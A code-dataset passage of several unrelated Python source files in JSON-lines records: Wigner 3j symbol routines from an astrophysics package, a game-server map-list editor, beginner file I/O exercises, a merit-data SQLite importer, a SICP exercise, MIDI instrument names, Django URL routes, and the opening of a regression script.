log_factorial(ii) +\n log_factorial( b1[x] + ii ) +\n log_factorial( b2[x] - ii) +\n log_factorial( b3[x] - ii) +\n log_factorial( b4[x] + ii ) +\n log_factorial(a[1][x] - ii) )\n sumres_ii=np.exp(sumres_t-log_den)*sgns[i] #FIXME: This has numerical issues.\n sumres_t[x]+=sumres_ii\n\n# sumres_t=np.exp(log_ressqrt+np.log(np.absolute(sumres_t)))*np.sign(sumres_t)\n\n prefid = np.ones_like(x0,dtype='int8') # (1 if (j_1 - j_2 - m_3) % 2 == 0 else -1)\n prefid[(j_1 - j_2 - m_3+j_3*0) % 2 == 1]=-1\n return sparse.COO(np.where(x0),data=sumres_t*prefid[x0]) #ressqrt taken inside sumres calc\n\n# def Wigner3j_parallel( m_1, m_2, m_3,j_1, j_2, j_3,ncpu=None):\n# if ncpu is None:\n# ncpu=cpu_count()-2\n# p=Pool(ncpu)\n# d_mat=sparse.stack(p.map( partial(Wigner3j, m_1, m_2, m_3,j_1, j_2), j_3,\n# chunksize=max(1,np.int(len(j_3)/ncpu/10))\n# ) )\n# p.close()\n# return d_mat[:,:,:,0].transpose((1,2,0))\n\n\n\ndef wigner_3j_2(j_1, j_2, j_3, m_1, m_2, m_3): \n #this and some helper functions below is a copy-paste of sympy function. We use it for testing.\n r\"\"\"\n Calculate the Wigner 3j symbol `\\operatorname{Wigner3j}(j_1,j_2,j_3,m_1,m_2,m_3)`.\n\n INPUT:\n\n - ``j_1``, ``j_2``, ``j_3``, ``m_1``, ``m_2``, ``m_3`` - integer or half integer\n\n OUTPUT:\n\n Rational number times the square root of a rational number.\n\n Examples\n ========\n\n >>> from sympy.physics.wigner import wigner_3j\n >>> wigner_3j(2, 6, 4, 0, 0, 0)\n sqrt(715)/143\n >>> wigner_3j(2, 6, 4, 0, 0, 1)\n 0\n\n It is an error to have arguments that are not integer or half\n integer values::\n\n sage: wigner_3j(2.1, 6, 4, 0, 0, 0)\n Traceback (most recent call last):\n ...\n ValueError: j values must be integer or half integer\n sage: wigner_3j(2, 6, 4, 1, 0, -1.1)\n Traceback (most recent call last):\n ...\n ValueError: m values must be integer or half integer\n\n NOTES:\n\n The Wigner 3j symbol obeys the following symmetry rules:\n\n - invariant under any permutation of the columns (with the\n exception of a sign change where `J:=j_1+j_2+j_3`):\n\n .. math::\n\n \\begin{aligned}\n \\operatorname{Wigner3j}(j_1,j_2,j_3,m_1,m_2,m_3)\n &=\\operatorname{Wigner3j}(j_3,j_1,j_2,m_3,m_1,m_2) \\\\\n &=\\operatorname{Wigner3j}(j_2,j_3,j_1,m_2,m_3,m_1) \\\\\n &=(-1)^J \\operatorname{Wigner3j}(j_3,j_2,j_1,m_3,m_2,m_1) \\\\\n &=(-1)^J \\operatorname{Wigner3j}(j_1,j_3,j_2,m_1,m_3,m_2) \\\\\n &=(-1)^J \\operatorname{Wigner3j}(j_2,j_1,j_3,m_2,m_1,m_3)\n \\end{aligned}\n\n - invariant under space inflection, i.e.\n\n .. math::\n\n \\operatorname{Wigner3j}(j_1,j_2,j_3,m_1,m_2,m_3)\n =(-1)^J \\operatorname{Wigner3j}(j_1,j_2,j_3,-m_1,-m_2,-m_3)\n\n - symmetric with respect to the 72 additional symmetries based on\n the work by [Regge58]_\n\n - zero for `j_1`, `j_2`, `j_3` not fulfilling triangle relation\n\n - zero for `m_1 + m_2 + m_3 \\neq 0`\n\n - zero for violating any one of the conditions\n `j_1 \\ge |m_1|`, `j_2 \\ge |m_2|`, `j_3 \\ge |m_3|`\n\n ALGORITHM:\n\n This function uses the algorithm of [Edmonds74]_ to calculate the\n value of the 3j symbol exactly. Note that the formula contains\n alternating sums over large factorials and is therefore unsuitable\n for finite precision arithmetic and only useful for a computer\n algebra system [Rasch03]_.\n\n REFERENCES:\n\n .. [Regge58] 'Symmetry Properties of Clebsch-Gordan Coefficients',\n T. Regge, Nuovo Cimento, Volume 10, pp. 544 (1958)\n\n .. [Edmonds74] 'Angular Momentum in Quantum Mechanics',\n A. R. Edmonds, Princeton University Press (1974)\n\n AUTHORS:\n\n - Jens Rasch (2009-03-24): initial version\n \"\"\"\n if int(j_1 * 2) != j_1 * 2 or int(j_2 * 2) != j_2 * 2 or \\\n int(j_3 * 2) != j_3 * 2:\n raise ValueError(\"j values must be integer or half integer\")\n if int(m_1 * 2) != m_1 * 2 or int(m_2 * 2) != m_2 * 2 or \\\n int(m_3 * 2) != m_3 * 2:\n raise ValueError(\"m values must be integer or half integer\")\n if m_1 + m_2 + m_3 != 0:\n return 0\n prefid = Integer((-1) ** int(j_1 - j_2 - m_3))\n m_3 = -m_3\n a1 = j_1 + j_2 - j_3\n if a1 < 0:\n return 0\n a2 = j_1 - j_2 + j_3\n if a2 < 0:\n return 0\n a3 = -j_1 + j_2 + j_3\n if a3 < 0:\n return 0\n if (abs(m_1) > j_1) or (abs(m_2) > j_2) or (abs(m_3) > j_3):\n return 0\n\n maxfact = max(j_1 + j_2 + j_3 + 1, j_1 + abs(m_1), j_2 + abs(m_2),\n j_3 + abs(m_3))\n# _calc_factlist(int(maxfact))\n\n argsqrt = Integer(_Factlist[int(j_1 + j_2 - j_3)] *\n _Factlist[int(j_1 - j_2 + j_3)] *\n _Factlist[int(-j_1 + j_2 + j_3)] *\n _Factlist[int(j_1 - m_1)] *\n _Factlist[int(j_1 + m_1)] *\n _Factlist[int(j_2 - m_2)] *\n _Factlist[int(j_2 + m_2)] *\n _Factlist[int(j_3 - m_3)] *\n _Factlist[int(j_3 + m_3)]) / \\\n _Factlist[int(j_1 + j_2 + j_3 + 1)]\n ressqrt = sy_sqrt(argsqrt)\n# print('sqrt',ressqrt.evalf())\n if ressqrt.is_complex:\n ressqrt = ressqrt.as_real_imag()[0]\n\n imin = max(-j_3 + j_1 + m_2, -j_3 + j_2 - m_1, 0)\n imax = min(j_2 + m_2, j_1 - m_1, j_1 + j_2 - j_3)\n sumres = 0\n for ii in range(int(imin), int(imax) + 1):\n den = _Factlist[ii] * \\\n _Factlist[int(ii + j_3 - j_1 - m_2)] * \\\n _Factlist[int(j_2 + m_2 - ii)] * \\\n _Factlist[int(j_1 - ii - m_1)] * \\\n _Factlist[int(ii + j_3 - j_2 + m_1)] * \\\n _Factlist[int(j_1 + j_2 - j_3 - ii)]\n sumres = sumres + Integer((-1) ** ii) / den\n# print(ii,sumres.evalf(),sy_log(den).evalf(24))\n# print(sumres.evalf())\n res = ressqrt * sumres * prefid\n return res\n\n_Factlist=[1,1]\ndef _calc_factlist(nn):\n r\"\"\"\n Function calculates a list of precomputed factorials in order to\n massively accelerate future calculations of the various\n coefficients.\n\n INPUT:\n\n - ``nn`` - integer, highest factorial to be computed\n\n OUTPUT:\n\n list of integers -- the list of precomputed factorials\n\n EXAMPLES:\n\n Calculate list of factorials::\n\n sage: from sage.functions.wigner import _calc_factlist\n sage: _calc_factlist(10)\n [1, 1, 2, 6, 24, 120, 720, 5040, 40320, 362880, 3628800]\n \"\"\"\n global _Factlist\n if nn >= len(_Factlist):\n for ii in range(len(_Factlist), int(nn + 1)):\n _Factlist.append(_Factlist[ii - 1] * ii)\n return _Factlist[:int(nn) + 1]\n\n_calc_factlist(1000)\n\ndef calc_factlist(nn):\n return _calc_factlist(nn)\n\ndef wigner_3j_asym(j_1,j_2,j_3,m_1,m_2,m_3): #assume j1,j2>>j3... not very accurate.. only seems to work when j1==j2\n sj=(j_1+j_2+1)\n th=np.arccos((m_1-m_2)/sj)\n wd=wigner_d(m_3,j_2-j_1,np.atleast_1d(th),j_3)[0,0]\n return ((-1)**(j_2+m_2))*wd/np.sqrt(sj)\n\ndef wigner_3j_000(j_1,j_2,j_3,m_1,m_2,m_3): \n \"\"\"\n This is the function we use to compute wigner_3j matrices for the case of \n m1=m2=m3=0. Algorithm from Hivon+ 2002\n \"\"\"\n J=j_1+j_2+j_3\n a1 = j_1 + j_2 - j_3\n a2 = j_1 - j_2 + j_3\n a3 = -j_1 + j_2 + j_3\n x=a1<0\n x=np.logical_or(x,a2<0)\n x=np.logical_or(x,a3<0)\n x=np.logical_or(x,J%2==1)\n# print(x)\n \n logwj=log_factorial(J/2)\n logwj-=log_factorial(J/2-j_1)\n logwj-=log_factorial(J/2-j_2)\n logwj-=log_factorial(J/2-j_3)\n logwj-=0.5*log_factorial(J+1)\n logwj+=0.5*log_factorial(J-2*j_1)\n logwj+=0.5*log_factorial(J-2*j_2)\n logwj+=0.5*log_factorial(J-2*j_3)\n logwj[x]=-308\n wj=(-1)**(np.int32(J/2))*np.exp(logwj) #0, when J/2 is not int\n wj[x]=0\n# x=J%2==1 #already applied in calling functions\n# wj[x]*=0\n return np.real(wj)\n\ndef wigner_3j_3(asym_fact,m1,m2,m3,js):\n \"\"\"\n Attempt to speed up calculations by approximating general wigner matrices with the case of m1=m2=m3=0.\n Does not work very well. \n \"\"\"\n if np.all(np.array(js)>np.absolute([m1,m2,m3])*asym_fact) and np.sum(js)%2==0:\n return np.float32(wigner_3j_000(js[0],js[1],js[2],m1,m2,m3))\n return np.float32(wigner_3j(js[0],js[1],js[2],m1,m2,m3)) #.evalf() #this is calling sympy function not Wigner3j\n\nfrom itertools import product as Comb\nimport time\ndef Wigner3j_parallel( m_1, m_2, m_3,j_1, j_2, j_3,ncpu=None,asym_fact=np.inf):\n \"\"\"\n To compute wigner matrices in parallel. Depricated. See functions in Gen_wig_3j*.py files.\n \"\"\"\n if ncpu is None:\n ncpu=cpu_count()-2\n\n t1=time.time()\n j_max=np.amax(j_1.max()+j_2.max()+j_3.max()+1)\n _calc_factlist(j_max)\n\n n1=len(j_1)\n n2=len(j_2)\n n3=len(j_3)\n\n c=np.array(np.meshgrid(j_1,j_2,j_3,indexing='ij')).T.reshape(-1,3) #only needed to put cuts below. Otherwise Comb is better\n\n# print('cmax',np.amax(c,axis=0))\n\n x=c[:,0]+c[:,1]-c[:,2]>=0\n x*=c[:,0]-c[:,1]+c[:,2]>=0\n x*=-c[:,0]+c[:,1]+c[:,2]>=0\n\n marr=np.array([m_1,m_2,m_3])\n\n# x*=(c>=np.abs(marr)).prod(axis=1)\n x*=abs(m_1) <= c[:,0]\n x*=abs(m_2) <= c[:,1]\n x*=abs(m_3) <= c[:,2]\n\n if np.all(marr==0):\n x*=(c[:,0]+c[:,1]+c[:,2])%2==0\n elif np.all(c>=np.absolute(marr)*asym_fact):\n x*=(c[:,0]+c[:,1]+c[:,2])%2==0\n\n c=c[x]\n\n x2=c>=np.absolute(marr)*asym_fact\n x2=x2.prod(axis=1)==1\n\n t2=time.time()\n t3=t2\n dd=np.zeros((n1,n2,n3),dtype='float32')\n\n if np.all(marr==0) or np.all(x2):\n d_mat=wigner_3j_000(c[:,0],c[:,1],c[:,2],m_1,m_2,m_3)\n indx1=np.searchsorted(j_1,c[:,0])\n indx2=np.searchsorted(j_2,c[:,1])\n indx3=np.searchsorted(j_3,c[:,2])\n dd[indx1,indx2,indx3]=d_mat\n\n else:\n d_mat=wigner_3j_000(c[x2][:,0],c[x2][:,1],c[x2][:,2],m_1,m_2,m_3)\n indx1=np.searchsorted(j_1,c[x2][:,0]) #FIXME: check this\n indx2=np.searchsorted(j_2,c[x2][:,1])\n indx3=np.searchsorted(j_3,c[x2][:,2])\n dd[indx1,indx2,indx3]=d_mat\n\n t3=time.time()\n\n if not np.all(x2):\n c=c[~x2]\n p=Pool(ncpu)\n d_mat2=p.map(partial(wigner_3j_3,asym_fact, m_1, m_2, m_3),c,chunksize=100)\n p.close()\n p.join()\n indx1=np.searchsorted(j_1,c[:,0])\n indx2=np.searchsorted(j_2,c[:,1])\n indx3=np.searchsorted(j_3,c[:,2])\n dd[indx1,indx2,indx3]=d_mat2\n t4=time.time()\n print(j_3,j_1.max(),j_2.max(),'done','wig time,size: ',t4-t3,c.size,np.amax(c,axis=0))\n tf=time.time()\n# print(j_3,j_1.max(),j_2.max(),'done',t2-t1,t3-t2,tf-t3,tf-t1)\n return dd\n# c=Comb(j_1,j_2,j_3) #slower\n# d_mat=p.map(partial(wigner_3j_3, m_1, m_2, m_3),c,chunksize=100)\n# d_mat=np.array(d_mat).reshape(n1,n2,n3) #when not putting any cuts on c\n# return d_mat\n\n\n\"\"\"\nFollowing are helper functions for a recursive algorithm implemented below in wig3j_recur.\n\"\"\"\ndef A_J(j,j2,j3,m2,m3):\n out=np.float64(j**2-(j2-j3)**2)\n x=j**2<(j2-j3)**2\n out[x]=0\n out=out**.5\n out*=((j2+j3+1)**2-j**2)**.5\n out*=(j**2-(m2+m3)**2)**.5\n return out\n\ndef B_J(j,j2,j3,m2,m3):\n out=np.float64((m2+m3)*(j2*(j2+1)-j3*(j3+1)))\n out-=(m2-m3)*j*(j+1)\n out*=2*j+1\n return out\n\ndef X_Np1(j,j2,j3,m2,m3): #X_n+1\n return j*A_J(j+1,j2,j3,m2,m3)\n\ndef X_N(j,j2,j3,m2,m3): #X_n+1\n return B_J(j,j2,j3,m2,m3)\n\ndef X_Nm1(j,j2,j3,m2,m3): #X_n+1\n return (j+1)*A_J(j,j2,j3,m2,m3)\n\n\ndef wig3j_recur(j1,j2,m1,m2,m3,j3_outmax=None):\n \"\"\"\n Using recursion relation to compute wigner matrices. Works well. Validated with the sympy function.\n Reference is Luscombe, James H. 1998, Physical Review E.\n \"\"\"\n# assert m3==-m1-m2\n \n if (abs(m1) > j1) or (abs(m2) > j2) or m1+m2+m3!=0:\n return 0\n\n j3_min=np.absolute(j1-j2)\n j3_max=j1+j2+1 #j3_max is j1+j2, +1 for 0 indexing\n \n j3=np.arange(j3_max)\n \n if j3_outmax is None:\n j3_outmax=j3_max\n \n wig_out=np.zeros(max(j3_max,j3_outmax))\n \n if j3_min>j3_outmax:\n return wig_out[:j3_outmax]#.reshape(1,1,j3_outmax)\n\n wig_out[j3_min]=1#wigner_3j(j1,j2,j3_min,m1,m2,m3)\n if j3_min==0: #in this case the recursion as implemented doesnot work (all zeros). use sympy function.\n wig_out[j3_min]=wigner_3j(j1,j2,j3_min,m1,m2,m3)\n wig_out[j3_min+1]=wigner_3j(j1,j2,j3_min+1,m1,m2,m3) #not strictly needed when j3_min>0\n \n x_Np1=X_Np1(j3,j2,j1,m1,m2)*-1 #j==j3\n x_N=X_N(j3,j2,j1,m1,m2) #j==j3\n x_Nm1=X_Nm1(j3,j2,j1,m1,m2) #j==j3\n \n for i in np.arange(j3_min,j3_max):\n if x_Np1[i]==0:\n continue\n wig_out[j3[i+1]]=x_Nm1[i]*wig_out[j3[i-1]]+x_N[i]*wig_out[j3[i]]\n wig_out[j3[i+1]]/=x_Np1[i] \n \n Norm=np.sum((2*j3+1)*(wig_out[:j3_max]**2))\n wig_out/=Norm**.5\n \n if np.sign(wig_out[j1+j2])!=np.sign((-1)**(j3_min)):\n wig_out*=-1\n \n #FIXME: this commented out part is for validation against sympy. Should implement it properly as test.\n# if j3_min==0 and not np.isclose(Norm,1): #in this case we started recursion with exact values at j3_min and hence norm should be 1.\n# print(\"Norm problem: \",j1,j2,j3_min,Norm,wig_out[:j3_max],)\n# else:\n# tt=wigner_3j(j1,j2,j3_min+1,m1,m2,m3) # This is only for testing\n# tt=np.float(tt)\n# if not np.isclose(wig_out[j3_min+1],tt):\n# print('j3min+1 comparison problem: ',j1,j2,j3_min+1,tt,wig_out[j3_min+1])\n \n \n# xxi=np.random.randint(j3_min+1,j3_max-1) #randomly compare a value with sympy calculation\n# wig_out2=wigner_3j(j1,j2,j3[xxi],m1,m2,m3)\n# try:\n# wig_out2=wig_out2.evalf()\n# print('random test ',xxi,wig_out[xxi],wig_out2)\n# except Exception as err:\n# print('warning, random test failed', err)\n# pass\n\n\n return wig_out[:j3_outmax]#.reshape(j3_outmax,1,1)\n","repo_name":"sukhdeep2/SkyLens","sub_path":"skylens/wigner_functions.py","file_name":"wigner_functions.py","file_ext":"py","file_size_in_byte":20949,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"30514974686","text":"from util.settings_manager import ServerSettings, ServerSettingsException\nfrom util.install_server import InsurgencyServerInstaller, InsurgencyInstallerException\nfrom util.map_manager import MapManager, MapManagerException\n\nimport argparse\n\ndef start_server():\n '''Start the server.'''\n # Check installation status\n if not InsurgencyServerInstaller.is_installed():\n print(\"The Insurgency: Sandstorm server binaries do not appear to be downloaded. Attempting to download.\")\n installer = InsurgencyServerInstaller()\n installer.install_is_server()\n\n # TODO: Finish server config/start routine\n\ndef map_list_create(map_manager: MapManager):\n valid = False\n while not valid:\n list_name = input(\"Time to create a map list! What should the list be called? \")\n \n if map_manager.has_list_called(list_name):\n print(\"There is already a list by that name, please delete the list first or choose another name.\")\n\n else:\n valid = True\n map_manager.create_map_list(list_name)\n map_list_loop(map_manager, list_name)\n\ndef map_list_loop(map_manager: MapManager, list_name):\n '''Loop through adding maps to a list.'''\n\n map_loop_help = \"\"\"\nCOMMANDS:\n \"(h)elp\": List commands.\n \"(m)aps\": List map names.\n \"(s)cenarios\": List scenarios that work with the selected map. *This can only be used if a map is selected.*\n \"(d)one\": End the current scenario list or map list.\n\nTIPS:\n - You can enter more than one map or scenario at a time -- just separate each one with commas. For instance, this is a valid way to enter these maps all at once: Town, Farmhouse, Mountain\n - If you're not sure which scenarios work with the map you selected, type \"scenarios\".\n - All commands can be written as their first letter as a form of shorthand. You can pull up this page with just \"h\".\n \"\"\"\n\n print(\"You will enter a map name, followed by a list of gamemodes on that map. Type \\\"help\\\" for some commands that might help you, or \\\"done\\\" to end the map entering process.\")\n\n user_input = \"\"\n while user_input.lower() != \"done\" or user_input != 'd':\n user_input = input(\"Enter the name of a map or type \\\"help\\\" for commands that could help you: \")\n\n if user_input.lower() == \"help\" or user_input == \"h\":\n print(map_loop_help)\n\n elif user_input.lower() == \"maps\" or user_input == \"m\":\n print(\"All valid map names:\")\n for m in map_manager.get_all_maps():\n print(m)\n\n elif user_input.lower() == \"done\" or user_input == \"d\":\n print(\"Map entry complete.\")\n break\n\n else:\n for map_name in user_input.split(\",\"):\n map_name = map_name.strip()\n map_list_edit_entry(map_manager, list_name, map_name)\n\n\ndef map_list_edit_entry(map_manager: MapManager, list_name, map_name):\n\n valid = False\n while not valid:\n if map_name not in map_manager.get_all_maps():\n print(\"\\\"{}\\\" is not a valid map name or command. Type \\\"maps\\\" to see the list of valid map names, or \\\"help\\\" for commands.\".format(map_name))\n continue\n\n user_input = input(\"Which scenarios would you like to include for {}? \".format(map_name))\n\n if user_input.lower() == \"scenarios\" or user_input == \"s\":\n print(\"Valid scenarios for {}:\".format(map_name))\n for scenario in map_manager.get_friendly_map_scenarios(map_name):\n print(scenario)\n\n elif user_input.lower() == \"done\" or user_input == \"d\":\n continue\n\n else:\n for scen_name in user_input.split(\",\"):\n scen_name = scen_name.strip()\n scen_name = scen_name.replace(\" \", \"_\")\n if scen_name not in map_manager.get_map_scenarios(map_name):\n print(\"\\\"{}\\\" is not a valid scenario name or command. Type \\\"scenarios\\\" to see the list of valid scenario names, or \\\"help\\\" for commands.\".format(scen_name))\n continue\n\n map_manager.append_to_map_list(list_name, map_manager.get_scenario_name(map_name, scen_name))\n map_manager.save_map_lists()\n print(\"Added all scenarios to the map list.\")\n valid = True\nif __name__ == \"__main__\":\n map_manager = MapManager()\n try:\n map_manager.load_map_lists()\n except MapManagerException:\n print(\"Could not load map list. This is only a problem if you expect maps to be saved already.\")\n\n map_list_create(map_manager)\n print(map_manager.get_map_list(\"FirstMapList\"))\n","repo_name":"nstgeorge/Inservency","sub_path":"inservency_maplisteditor.py","file_name":"inservency_maplisteditor.py","file_ext":"py","file_size_in_byte":4638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"21228045590","text":"my_list = [i ** 2 for i in range(1, 11)]\n\nmy_file = open(\"output.txt\", \"w\")\n\n# Add your code below!\nfor i in my_list:\n my_file.write(str(i) + \"\\n\")\n\nmy_file.close()\n\n# read\nmy_file = open(\"output.txt\", \"r\")\nprint(my_file.read())\nmy_file.close()\n\n# read line\nmy_file = open(\"text.txt\", \"r\")\nprint(my_file.readline())\nprint(my_file.readline())\nprint(my_file.readline())\nmy_file.close()\n\n# close file\n# Use a file handler to open a file for writing\nwrite_file = open(\"text.txt\", \"w\")\n\n# Open the file for reading\nread_file = open(\"text.txt\", \"r\")\n\n# Write to the file\nwrite_file.write(\"Not closing files is VERY BAD.\")\n\nwrite_file.close()\n\n# Try to read from the file\nprint(read_file.read())\nread_file.close()\n\n# with ...as...\nwith open(\"text.txt\", \"w\") as my_file:\n my_file.write(\"Success!\")\n\nif my_file.closed:\n my_file.close()\n\n\nprint(my_file.closed)\n","repo_name":"AiaRup/she-codes-basic-python","sub_path":"lesson-12/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11546170688","text":"#dependencies\nimport pandas as pd\nimport numpy as np\n#from datetime import datetime #this library is not required\nfrom sqlalchemy import create_engine, Column, Integer, String, Float\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.ext.declarative import declarative_base\n\n#path of sqlite file goes here in relation to current file\ndatabase_path = 'merit.sqlite'\n\n#create DataFrame from mert transaction history file on loyce.club\ndata = pd.read_csv('http://loyce.club/Merit/merit.all.txt', sep='\t', header=None)\n#rename columns\ndata = data.rename(columns={0: 'time', 1: 'number_of_merit', 2:'message_id', 3:'UID_from', 4: 'UID_to'})\n\n\n\n#connect to sqllite db\nengine = create_engine(f\"sqlite:///{database_path}\")\nsession = Session(engine)\n\n\n\n#use default declarative base function as variable 'Base'\nBase = declarative_base()\n\n#define table schema\nclass Merit(Base):\n __tablename__ = 'merit'\n id = Column(Integer, primary_key=True)#this is a column with a unique value for each transaction\n time = Column(Integer) #unix time\n number_of_merit = Column(Integer)\n message_id = Column(String(25))\n uid_from = Column(Integer)\n uid_to = Column(Integer)\n\n\n#create table in sqllite file\nBase.metadata.create_all(engine)\n\n\n#set first value for id as 1\nid1 = 1\n#loop through DataFrame to add each row in the DataFrame to the SQLlite DB.\nfor x in np.arange(len(data)):\n session.add(Merit(id=id1, time=int(data['time'][x]), number_of_merit=int(data['number_of_merit'][x]),\n message_id=data['message_id'][x], uid_from=int(data['UID_from'][x]), uid_to=int(data['UID_to'][x])))\n id1 = id1 + 1 #after the row is added, the id1 variable value will be increased by one\n #will commit rows in batches of 100\n if len(session.new) > 100:\n session.commit()\nsession.commit() #commit last batch of rows\n\n\n#check to make sure all rows were successfully imported\nif len(session.query(Merit.id).all()) == len(data):\n print(f'All the data from the DataFrame was successfully imported into a SQL file found at {database_path}')\nelse:\n print(f'There was a problem importing all the merit transactions and {len(data) - len(session.query(Merit.id).all())} were not imported. Troubleshooting is required')\n","repo_name":"numberedprime7/merit-api","sub_path":"merit2sql.py","file_name":"merit2sql.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40816410318","text":"# -*- coding: utf-8 -*-\n\"\"\"\nhttps://mitpress.mit.edu/sicp/full-text/book/book-Z-H-16.html#%_thm_2.62\n\"\"\"\nfrom Chapter2.exercises.exercise2_61 import adjoin_set\nfrom Chapter2.themes.lisp_list_structured_data import lisp_list, print_lisp_list\nfrom Chapter2.themes.sequences_as_conventional_interfaces import accumulate\n\n\ndef union_set(set1, set2):\n \"\"\"Computes the union of set1 and set2 in O(n)\"\"\"\n return accumulate(adjoin_set, set1, set2)\n\n\ndef run_the_magic():\n s1 = lisp_list(1, 2, 3, 6, 10, 45, 56, 77, 90, 110, 120, 140, 150)\n s2 = lisp_list(1, 5, 26, 121)\n print_lisp_list(union_set(s1, s2))\n\n from timeit import Timer\n t1 = Timer(stmt='union_set(%(s1)s, %(s2)s)' % locals(),\n setup='from Chapter2.exercises.exercise2_62 import union_set')\n t2 = Timer(stmt='union_set(%(s1)s, %(s2)s)' % locals(),\n setup='from Chapter2.exercises.exercise2_59 import union_set')\n\n time = t1.timeit()\n print('average time (ordered list): %s' % time)\n\n time = t2.timeit()\n print('average_time (unordered list): %s' % time)\n\n\nif __name__ == \"__main__\":\n run_the_magic()\n","repo_name":"aoyono/sicpy","sub_path":"Chapter2/exercises/exercise2_62.py","file_name":"exercise2_62.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6146630459","text":"names = {\n 0:\"Yamaha Grand Piano\",\n 1:\"Bright Yamaha Grand\",\n 2:\"Electric Piano\",\n 3:\"Honky Tonk\",\n 4:\"Rhodes EP\",\n 5:\"Legend EP 2\",\n 6:\"Harpsichord\",\n 7:\"Clavinet\",\n 8:\"Celesta\",\n 9:\"Glockenspiel\",\n 10:\"Music Box\",\n 11:\"Vibraphone\",\n 12:\"Marimba\",\n 13:\"Xylophone\",\n 14:\"Tubular Bells\",\n 15:\"Dulcimer\",\n 16:\"DrawbarOrgan\",\n 17:\"Percussive Organ\",\n 18:\"Rock Organ\",\n 19:\"Church Organ\",\n 20:\"Reed Organ\",\n 21:\"Accordian\",\n 22:\"Harmonica\",\n 23:\"Bandoneon\",\n 24:\"Nylon String Guitar\",\n 25:\"Steel String Guitar\",\n 26:\"Jazz Guitar\",\n 27:\"Clean Guitar\",\n 28:\"Palm Muted Guitar\",\n 29:\"Overdrive Guitar\",\n 30:\"Distortion Guitar\",\n 31:\"Guitar Harmonics\",\n 32:\"Acoustic Bass\",\n 33:\"Fingered Bass\",\n 34:\"Picked Bass\",\n 35:\"Fretless Bass\",\n 36:\"Slap Bass\",\n 37:\"Pop Bass\",\n 38:\"Synth Bass 1\",\n 39:\"Synth Bass 2\",\n 40:\"Violin\",\n 41:\"Viola\",\n 42:\"Cello\",\n 43:\"Contrabass\",\n 44:\"Tremolo\",\n 45:\"Pizzicato Section\",\n 46:\"Harp\",\n 47:\"Timpani\",\n 48:\"Strings\",\n 49:\"Slow Strings\",\n 50:\"Synth Strings 1\",\n 51:\"Synth Strings 2\",\n 52:\"Ahh Choir\",\n 53:\"Ohh Voices\",\n 54:\"Synth Voice\",\n 55:\"Orchestra Hit\",\n 56:\"Trumpet\",\n 57:\"Trombone\",\n 58:\"Tuba\",\n 59:\"Muted Trumpet\",\n 60:\"French Horns\",\n 61:\"Brass Section\",\n 62:\"Synth Brass 1\",\n 63:\"Synth Brass 2\",\n 64:\"Soprano Sax\",\n 65:\"Alto Sax\",\n 66:\"Tenor Sax\",\n 67:\"Baritone Sax\",\n 68:\"Oboe\",\n 69:\"English Horn\",\n 70:\"Bassoon\",\n 71:\"Clarinet\",\n 72:\"Piccolo\",\n 73:\"Flute\",\n 74:\"Recorder\",\n 75:\"Pan Flute\",\n 76:\"Bottle Chiff\",\n 77:\"Shakuhachi\",\n 78:\"Whistle\",\n 79:\"Ocarina\",\n 80:\"Square Lead\",\n 81:\"Saw Wave\",\n 82:\"Calliope Lead\",\n 83:\"Chiffer Lead\",\n 84:\"Charang\",\n 85:\"Solo Vox\",\n 86:\"Fifth Sawtooth Wave\",\n 87:\"Bass & Lead\",\n 88:\"Fantasia\",\n 89:\"Warm Pad\",\n 90:\"Polysynth\",\n 91:\"Space Voice\",\n 92:\"Bowed Glass\",\n 93:\"Metal Pad\",\n 94:\"Halo Pad\",\n 95:\"Sweep Pad\",\n 96:\"Ice Rain\",\n 97:\"Soundtrack\",\n 98:\"Crystal\",\n 99:\"Atmosphere\",\n100:\"Brightness\",\n101:\"Goblin\",\n102:\"Echo Drops\",\n103:\"Star Theme\",\n104:\"Sitar\",\n105:\"Banjo\",\n106:\"Shamisen\",\n107:\"Koto\",\n108:\"Kalimba\",\n109:\"BagPipe\",\n110:\"Fiddle\",\n111:\"Shenai\",\n112:\"Tinker Bell\",\n113:\"Agogo\",\n114:\"Steel Drums\",\n115:\"Woodblock\",\n116:\"Taiko Drum\",\n117:\"Melodic Tom\",\n118:\"Synth Drum\",\n119:\"Reverse Cymbal\",\n120:\"Fret Noise\",\n121:\"Breath Noise\",\n122:\"Sea Shore\",\n123:\"Bird Tweet\",\n124:\"Telephone\",\n125:\"Helicopter\",\n126:\"Applause\",\n127:\"Gun Shot\"}\n\ndef name_for(i):\n return names.get(i, \"Instrument \" + str(i))\n","repo_name":"betaveros/voxx","sub_path":"midi_names.py","file_name":"midi_names.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"73540825531","text":"from django.urls import path\nfrom . import views\n\napp_name = \"rooms\"\nurlpatterns = [\n path(\"\", views.homepage_view, name=\"homepage\"),\n path(\"topics/\", views.topics_view, name=\"topics\"),\n path(\"activities/\", views.activities_view, name=\"activities\"),\n path(\"room/<int:pk>/\", views.room_detail_view, name=\"room_detail\"),\n path(\"room/add/\", views.room_create_view, name=\"room_create\"),\n path(\"room/<int:pk>/edit/\", views.room_update_view, name=\"room_update\"),\n path(\"room/<int:pk>/delete/\", views.room_delete_view, name=\"room_delete\"),\n path(\"message/<int:pk>/delete/\", views.message_delete_view, name=\"message_delete\"),\n]\n","repo_name":"ArpanIng/Chat-Room","sub_path":"rooms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3104447595","text":"# -*- coding: utf-8 -*-\n# importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n#importing the dataset\ndataset = pd.read_csv('Salary_Data.csv')\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 1].values\n\n#Splitting dataset into Test and train\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, 